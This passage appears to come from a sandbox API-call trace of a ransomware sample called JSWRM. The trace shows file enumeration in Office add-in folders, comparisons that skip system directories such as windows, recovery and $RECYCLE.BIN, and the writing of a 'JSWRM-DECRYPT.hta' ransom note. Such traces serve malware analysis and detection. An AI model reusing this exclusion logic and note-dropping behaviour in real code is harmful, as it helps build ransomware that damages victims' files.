lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x575324, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x575324, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59b433, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.290] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d728, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d578, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dff8 [0126.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.291] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd7bf89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd7bf89, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd7bf89, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.291] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0126.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0126.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.292] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb6089d0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6089d0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb654e78, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e70, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.292] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0126.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0126.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0126.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.293] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb6089d0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6089d0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb654e78, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e70, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.293] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0126.293] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0126.293] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0126.293] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0126.293] lstrcmpiW (lpString1="de", lpString2="...") returned 1 [0126.293] lstrcmpiW (lpString1="de", lpString2="windows") returned -1 [0126.293] lstrcmpiW (lpString1="de", lpString2="recovery") returned -1 [0126.293] lstrcmpiW (lpString1="de", lpString2="perflogs") returned -1 [0126.293] lstrcmpiW (lpString1="de", lpString2="documents and settings") returned -1 [0126.293] lstrcmpiW (lpString1="de", lpString2="$RECYCLE.BIN") returned 1 [0126.293] lstrcmpiW (lpString1="de", lpString2="system volume information") returned -1 [0126.293] lstrcmpiW (lpString1="de", lpString2="msocache") returned -1 [0126.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0126.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0126.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0126.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\jswrm-decrypt.hta")) returned 0xffffffff [0126.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0126.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0126.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0126.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0126.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0126.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.359] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.359] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.360] CloseHandle (hObject=0x314) returned 1 [0126.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0126.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0126.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0126.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0126.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0126.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0126.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0126.361] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\jswrm-decrypt.hta")) returned 0x20 [0126.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0126.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0126.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0126.361] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41ef2ba6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0126.361] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.361] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41ef2ba6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.361] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.361] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.361] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ef2ba6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41ef2ba6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41fb1507, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0126.362] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a4, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.362] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 